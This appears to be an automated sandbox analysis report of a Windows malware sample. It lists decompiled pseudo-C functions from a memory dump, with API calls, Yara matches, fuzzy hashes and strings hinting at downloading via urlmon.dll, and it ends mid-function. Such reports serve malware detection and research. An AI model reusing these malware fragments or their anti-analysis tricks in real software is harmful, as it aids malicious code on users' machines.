                                                                                                                                                  						E0041B800( &_v284, 0x104);
                                                                                                                                                  						E0041BE70( &_v284,  &_v804);
                                                                                                                                                  						_t58 = _t57 + 0x10;
                                                                                                                                                  						_t52 = 0x4f;
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_t31 = E00414DB0(E00414D50(_t54, _t52),  &_v284);
                                                                                                                                                  							_t58 = _t58 + 0x10;
                                                                                                                                                  							if(_t31 != 0) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_t52 = _t52 + 1;
                                                                                                                                                  							if(_t52 <= 0x62) {
                                                                                                                                                  								continue;
                                                                                                                                                  							} else {
                                                                                                                                                  							}
                                                                                                                                                  							goto L8;
                                                                                                                                                  						}
                                                                                                                                                  						_t9 = _t54 + 0x14; // 0xffffe055
                                                                                                                                                  						 *(_t54 + 0x474) =  *(_t54 + 0x474) ^  *_t9;
                                                                                                                                                  						_t39 = 1;
                                                                                                                                                  						L8:
                                                                                                                                                  						_t33 = E004080C0( &_v24,  &_v840);
                                                                                                                                                  						_t57 = _t58 + 8;
                                                                                                                                                  					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                                  					_t34 = E00408140(_t54,  &_v24); // executed
                                                                                                                                                  					if(_t39 == 0) {
                                                                                                                                                  						asm("rdtsc");
                                                                                                                                                  						asm("rdtsc");
                                                                                                                                                  						_v8 = _t34 - 0 + _t34;
                                                                                                                                                  						 *((intOrPtr*)(_t54 + 0x55c)) =  *((intOrPtr*)(_t54 + 0x55c)) + 0xffffffba;
                                                                                                                                                  					}
                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0x31)) =  *((intOrPtr*)(_t54 + 0x31)) + _t39;
                                                                                                                                                  					_t20 = _t54 + 0x31; // 0x5608758b
                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0x32)) =  *((intOrPtr*)(_t54 + 0x32)) +  *_t20 + 1;
                                                                                                                                                  					return 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					return _t24;
                                                                                                                                                  				}
                                                                                                                                                  			}


                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                                                                                  • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                                                                                                                                  • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                                                                                  • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
                                                                                                                                                  				void* _t10;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  
                                                                                                                                                  				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                  				_t4 =  &_a16; // 0x414c6f
                                                                                                                                                  				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
                                                                                                                                                  				return _t10;
                                                                                                                                                  			}


                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID: oLA
                                                                                                                                                  • API String ID: 1279760036-3789366272
                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                  			E004082F0(void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                  				char _v3;
                                                                                                                                                  				char _v67;
                                                                                                                                                  				char _v68;
                                                                                                                                                  				intOrPtr* _t16;
                                                                                                                                                  				int _t17;
                                                                                                                                                  				long _t24;
                                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  
                                                                                                                                                  				_t33 = __eflags;
                                                                                                                                                  				_push(0x3f);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				 *((intOrPtr*)( &_v67 - 0x3a)) =  *((intOrPtr*)( &_v67 - 0x3a)) + __edx;
                                                                                                                                                  				asm("rol byte [eax], 0xe8");
                                                                                                                                                  				 *(__edx + 3) =  *(__edx + 3) >> 0x51;
                                                                                                                                                  				E0041C3F0();
                                                                                                                                                  				_t16 = E00414E10(_a4 + 0x1c, E0040ACC0(_t33, _a4 + 0x1c,  &_v68), 0, 0, 0xc4e7b6d6);
                                                                                                                                                  				_t28 = _t16;
                                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                                  					_t24 = _a8;
                                                                                                                                                  					_t17 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                                                                                                                                  					_t35 = _t17;
                                                                                                                                                  					if(_t17 == 0) {
                                                                                                                                                  						_t17 =  *_t28(_t24, 0x8003,  &_v3 + (E0040A450(_t35, 1, 8) & 0x000000ff) - 0x40, _t17);
                                                                                                                                                  					}
                                                                                                                                                  					return _t17;
                                                                                                                                                  				}
                                                                                                                                                  				return _t16;
                                                                                                                                                  			}


                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: b9b79d427e30a74c20ea09e4d7148b624c3393b461da0744b498f80ec6a4bdbd
                                                                                                                                                  • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                                                                                                                                  • Opcode Fuzzy Hash: b9b79d427e30a74c20ea09e4d7148b624c3393b461da0744b498f80ec6a4bdbd
                                                                                                                                                  • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 41%
                                                                                                                                                  			E004082B4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                  				int _t21;
                                                                                                                                                  				long _t33;
                                                                                                                                                  				int _t38;
                                                                                                                                                  				intOrPtr* _t40;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  				void* _t43;
                                                                                                                                                  
                                                                                                                                                  				asm("lahf");
                                                                                                                                                  				if(__eflags > 0) {
                                                                                                                                                  					 *((intOrPtr*)(__eax - 0x3a)) =  *((intOrPtr*)(__eax - 0x3a)) + __edx;
                                                                                                                                                  					_t43 = _t42 + 1;
                                                                                                                                                  					asm("rol byte [eax], 0xe8");
                                                                                                                                                  					 *(__edx + 3) =  *(__edx + 3) >> 0x51;
                                                                                                                                                  					E0041C3F0();
                                                                                                                                                  					_t21 = E00414E10( *((intOrPtr*)(_t43 + 8)) + 0x1c, E0040ACC0(__eflags,  *((intOrPtr*)(_t43 + 8)) + 0x1c, _t43 - 0x40), 0, 0, 0xc4e7b6d6);
                                                                                                                                                  					_t38 = _t21;
                                                                                                                                                  					__eflags = _t38;
                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                  						_t33 =  *(_t43 + 0xc);
                                                                                                                                                  						_t21 = PostThreadMessageW(_t33, 0x111, 0, 0); // executed
                                                                                                                                                  						__eflags = _t21;
                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                  							_t21 =  *_t38(_t33, 0x8003, _t43 + (E0040A450(__eflags, 1, 8) & 0x000000ff) - 0x40, _t21);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					return _t21;
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(0x11c6f95e);
                                                                                                                                                  					asm("adc eax, ebp");
                                                                                                                                                  					asm("lds ebp, [edi]");
                                                                                                                                                  					 *__eax =  *__eax + __eax;
                                                                                                                                                  					_t40 = __eax;
                                                                                                                                                  					return E0041B140(__ecx) + _t40 + 0x1000;
                                                                                                                                                  				}
                                                                                                                                                  			}










                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 65eb7dd41664316029f9a1a0a53ddf4b21b082d6d66c9e7afbccc8fe92b8de3b
                                                                                                                                                  • Instruction ID: d48ca81efc16e9748d7ccb43bdd4a35d2d56e06922ad4484a4080720d69b134b
                                                                                                                                                  • Opcode Fuzzy Hash: 65eb7dd41664316029f9a1a0a53ddf4b21b082d6d66c9e7afbccc8fe92b8de3b
                                                                                                                                                  • Instruction Fuzzy Hash: 72014C317407543AE71166685D43FFF7B14AF81B14F0982AEFE44BE1C3C6E9180642E9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                  			E0041A052(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                  				char _t12;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  
                                                                                                                                                  				asm("rcl ecx, cl");
                                                                                                                                                  				asm("rep insb");
                                                                                                                                                  				asm("rol ebx, cl");
                                                                                                                                                  				_t9 = _a4;
                                                                                                                                                  				_t3 = _t9 + 0xc74; // 0xc74
                                                                                                                                                  				E0041A950(_t18, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                  				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                  				return _t12;
                                                                                                                                                  			}






                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: e6818b2e1f97fe3368e3b8431b8da1fa1ea91d2864a2d3779e11874247444e65
                                                                                                                                                  • Instruction ID: 2c97211f60695eaf0afd548d493c0fa8256eb5ca2da6a4da6b64e692b9e06fa3
                                                                                                                                                  • Opcode Fuzzy Hash: e6818b2e1f97fe3368e3b8431b8da1fa1ea91d2864a2d3779e11874247444e65
                                                                                                                                                  • Instruction Fuzzy Hash: 2FE068B80003454FDB04EE38C4D24673B84EF802207008A8FEC5943202C124C81987A1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                  				char _t10;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  
                                                                                                                                                  				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                  				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                  				return _t10;
                                                                                                                                                  			}





                                                                                                                                                  0x0041a06f
                                                                                                                                                  0x0041a077
                                                                                                                                                  0x0041a08d
                                                                                                                                                  0x0041a091

                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                  				int _t10;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  
                                                                                                                                                  				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                  				return _t10;
                                                                                                                                                  			}





                                                                                                                                                  0x0041a1da
                                                                                                                                                  0x0041a1f0
                                                                                                                                                  0x0041a1f4

                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E0041A095(intOrPtr _a4, int _a8) {
                                                                                                                                                  				void* _t13;
                                                                                                                                                  
                                                                                                                                                  				asm("invalid");
                                                                                                                                                  				_t7 = _a4;
                                                                                                                                                  				E0041A950(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
                                                                                                                                                  				ExitProcess(_a8);
                                                                                                                                                  			}




                                                                                                                                                  0x0041a09d
                                                                                                                                                  0x0041a0a3
                                                                                                                                                  0x0041a0ba
                                                                                                                                                  0x0041a0c8

                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  • Opcode ID: a8056092284fd02524644ebf374f23c095ed5da5ffe8f5e4d983275d848f4a59
                                                                                                                                                  • Instruction ID: 3d5f5d4bedbb88bf5e9f9553445ff45a8df491e82a87483fb3bdd8882b899343
                                                                                                                                                  • Opcode Fuzzy Hash: a8056092284fd02524644ebf374f23c095ed5da5ffe8f5e4d983275d848f4a59
                                                                                                                                                  • Instruction Fuzzy Hash: 94E046712002046BC220DF98CC96FD73BA8EF09750F018458BA285F241C530AA01CAA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041A0A0(intOrPtr _a4, int _a8) {
                                                                                                                                                  				void* _t10;
                                                                                                                                                  
                                                                                                                                                  				_t5 = _a4;
                                                                                                                                                  				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                  				ExitProcess(_a8);
                                                                                                                                                  			}





                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                                                                                                                                  • API String ID: 0-1367105278
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E02558788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				short* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				signed int _v32;
                                                                                                                                                  				char _v36;
                                                                                                                                                  				signed int _v40;
                                                                                                                                                  				char _v44;
                                                                                                                                                  				signed int _v48;
                                                                                                                                                  				signed int _v52;
                                                                                                                                                  				signed int _v56;
                                                                                                                                                  				signed int _v60;
                                                                                                                                                  				char _v68;
                                                                                                                                                  				void* _t216;
                                                                                                                                                  				intOrPtr _t231;
                                                                                                                                                  				short* _t235;
                                                                                                                                                  				intOrPtr _t257;
                                                                                                                                                  				short* _t261;
                                                                                                                                                  				intOrPtr _t284;
                                                                                                                                                  				intOrPtr _t288;
                                                                                                                                                  				void* _t314;
                                                                                                                                                  				signed int _t318;
                                                                                                                                                  				short* _t319;
                                                                                                                                                  				intOrPtr _t321;
                                                                                                                                                  				void* _t328;
                                                                                                                                                  				void* _t329;
                                                                                                                                                  				char* _t332;
                                                                                                                                                  				signed int _t333;
                                                                                                                                                  				signed int* _t334;
                                                                                                                                                  				void* _t335;
                                                                                                                                                  				void* _t338;
                                                                                                                                                  				void* _t339;
                                                                                                                                                  
                                                                                                                                                  				_t328 = __edx;
                                                                                                                                                  				_t322 = __ecx;
                                                                                                                                                  				_t318 = 0;
                                                                                                                                                  				_t334 = _a4;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v28 = 0;
                                                                                                                                                  				_v48 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v40 = 0;
                                                                                                                                                  				_v32 = 0;
                                                                                                                                                  				_v52 = 0;
                                                                                                                                                  				if(_t334 == 0) {
                                                                                                                                                  					_t329 = 0xc000000d;
                                                                                                                                                  					L49:
                                                                                                                                                  					_t334[0x11] = _v56;
                                                                                                                                                  					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                  					_t334[0x12] = _v60;
                                                                                                                                                  					_t334[0x13] = _v28;
                                                                                                                                                  					_t334[0x17] = _v20;
                                                                                                                                                  					_t334[0x16] = _v48;
                                                                                                                                                  					_t334[0x18] = _v40;
                                                                                                                                                  					_t334[0x14] = _v32;
                                                                                                                                                  					_t334[0x15] = _v52;
                                                                                                                                                  					return _t329;
                                                                                                                                                  				}
                                                                                                                                                  				_v56 = 0;
                                                                                                                                                  				if(E02558460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                  					_v56 = 1;
                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                  						_t207 = E0253E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                  					}
                                                                                                                                                  					_push(1);
                                                                                                                                                  					_v8 = _t318;
                                                                                                                                                  					E0255718A(_t207);
                                                                                                                                                  					_t335 = _t335 + 4;
                                                                                                                                                  				}
                                                                                                                                                  				_v60 = _v60 | 0xffffffff;
                                                                                                                                                  				if(E02558460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                  					_t333 =  *_v8;
                                                                                                                                                  					_v60 = _t333;
                                                                                                                                                  					_t314 = E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                  					_push(_t333);
                                                                                                                                                  					_v8 = _t318;
                                                                                                                                                  					E0255718A(_t314);
                                                                                                                                                  					_t335 = _t335 + 4;
                                                                                                                                                  				}
                                                                                                                                                  				_t216 = E02558460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                  				_t332 = ";";
                                                                                                                                                  				if(_t216 < 0) {
                                                                                                                                                  					L17:
                                                                                                                                                  					if(E02558460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                  						L30:
                                                                                                                                                  						if(E02558460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                  							L46:
                                                                                                                                                  							_t329 = 0;
                                                                                                                                                  							L47:
                                                                                                                                                  							if(_v8 != _t318) {
                                                                                                                                                  								E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                  							}
                                                                                                                                                  							if(_v28 != _t318) {
                                                                                                                                                  								if(_v20 != _t318) {
                                                                                                                                                  									E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                  									_v20 = _t318;
                                                                                                                                                  									_v40 = _t318;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							goto L49;
                                                                                                                                                  						}
                                                                                                                                                  						_t231 = _v24;
                                                                                                                                                  						_t322 = _t231 + 4;
                                                                                                                                                  						_push(_t231);
                                                                                                                                                  						_v52 = _t322;
                                                                                                                                                  						E0255718A(_t231);
                                                                                                                                                  						if(_t322 == _t318) {
                                                                                                                                                  							_v32 = _t318;
                                                                                                                                                  						} else {
                                                                                                                                                  							_v32 = E0253E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                  						}
                                                                                                                                                  						if(_v32 == _t318) {
                                                                                                                                                  							_v52 = _t318;
                                                                                                                                                  							L58:
                                                                                                                                                  							_t329 = 0xc0000017;
                                                                                                                                                  							goto L47;
                                                                                                                                                  						} else {
                                                                                                                                                  							E02532340(_v32, _v8, _v24);
                                                                                                                                                  							_v16 = _v32;
                                                                                                                                                  							_a4 = _t318;
                                                                                                                                                  							_t235 = E0254E679(_v32, _t332);
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t319 = _t235;
                                                                                                                                                  								if(_t319 == 0) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								 *_t319 = 0;
                                                                                                                                                  								_t321 = _t319 + 2;
                                                                                                                                                  								E0253E2A8(_t322,  &_v68, _v16);
                                                                                                                                                  								if(E02555553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  									_a4 = _a4 + 1;
                                                                                                                                                  								}
                                                                                                                                                  								_v16 = _t321;
                                                                                                                                                  								_t235 = E0254E679(_t321, _t332);
                                                                                                                                                  								_pop(_t322);
                                                                                                                                                  							}
                                                                                                                                                  							_t236 = _v16;
                                                                                                                                                  							if( *_v16 != _t319) {
                                                                                                                                                  								E0253E2A8(_t322,  &_v68, _t236);
                                                                                                                                                  								if(E02555553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  									_a4 = _a4 + 1;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							if(_a4 == 0) {
                                                                                                                                                  								E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                  								_v52 = _v52 & 0x00000000;
                                                                                                                                                  								_v32 = _v32 & 0x00000000;
                                                                                                                                                  							}
                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                  								E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                  							}
                                                                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                                                                  							_t318 = 0;
                                                                                                                                                  							goto L46;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t257 = _v24;
                                                                                                                                                  					_t322 = _t257 + 4;
                                                                                                                                                  					_push(_t257);
                                                                                                                                                  					_v40 = _t322;
                                                                                                                                                  					E0255718A(_t257);
                                                                                                                                                  					_t338 = _t335 + 4;
                                                                                                                                                  					if(_t322 == _t318) {
                                                                                                                                                  						_v20 = _t318;
                                                                                                                                                  					} else {
                                                                                                                                                  						_v20 = E0253E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                  					}
                                                                                                                                                  					if(_v20 == _t318) {
                                                                                                                                                  						_v40 = _t318;
                                                                                                                                                  						goto L58;
                                                                                                                                                  					} else {
                                                                                                                                                  						E02532340(_v20, _v8, _v24);
                                                                                                                                                  						_v16 = _v20;
                                                                                                                                                  						_a4 = _t318;
                                                                                                                                                  						_t261 = E0254E679(_v20, _t332);
                                                                                                                                                  						_t335 = _t338 + 0x14;
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_v12 = _t261;
                                                                                                                                                  							if(_t261 == _t318) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_v12 = _v12 + 2;
                                                                                                                                                  							 *_v12 = 0;
                                                                                                                                                  							E0253E2A8(_v12,  &_v68, _v16);
                                                                                                                                                  							if(E02555553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                                  							}
                                                                                                                                                  							_v16 = _v12;
                                                                                                                                                  							_t261 = E0254E679(_v12, _t332);
                                                                                                                                                  							_pop(_t322);
                                                                                                                                                  						}
                                                                                                                                                  						_t269 = _v16;
                                                                                                                                                  						if( *_v16 != _t318) {
                                                                                                                                                  							E0253E2A8(_t322,  &_v68, _t269);
                                                                                                                                                  							if(E02555553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						if(_a4 == _t318) {
